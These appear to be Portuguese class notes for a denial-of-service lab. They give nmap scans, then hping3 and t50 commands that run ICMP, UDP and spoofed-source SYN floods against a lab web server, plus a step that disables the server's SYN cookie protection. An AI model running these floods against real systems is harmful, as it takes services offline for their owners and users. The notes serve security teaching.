// Aula 2 - Fazendo um teste de DoS

https://www.turnkeylinux.org/
https://www.turnkeylinux.org/lamp
https://tools.kali.org/stress-testing/t50
https://gitlab.com/fredericopissarra/t50
https://pt.wikipedia.org/wiki/SYN_Flood

# nmap -sV 192.168.15.56

# nmap -sV 2804:431:c7c4:35fa:a00:27ff:fe2e:70d7 -6

# hping3 -h

# iptraf-ng

# apt-get update ; apt-get install iptraf-ng

# iptraf-ng

# ping 192.168.15.56

# ping 2804:431:c7c4:35fa:a00:27ff:fe2e:70d7 -6

# hping3 192.168.15.56 --icmp

# hping3 192.168.15.56 --icmp

# hping3 192.168.15.56 --flood

# t50 192.168.15.56 --flood

# hping3 192.168.15.56 --flood --data 15000 

# hping3 192.168.15.56 --flood --data 100000 

# hping3 192.168.15.56 --udp --flood --data 1000000

# hping3 192.168.15.56 --flood -p 80 --data 1000000

# t50 192.168.15.56 --flood --dport 80

# netstat -an | grep SYN

# hping3 192.168.15.56 -S --flood -p 80 --rand-source

# netstat -an | grep SYN

# netstat -an | grep SYN | wc -l

# cat /proc/sys/net/ipv4/tcp_syncookies

# echo 0 > /proc/sys/net/ipv4/tcp_syncookies

# hping3 192.168.15.56 -S --flood -p 80 --rand-source

# t50 192.168.15.56 --flood --syn --dport 80

















































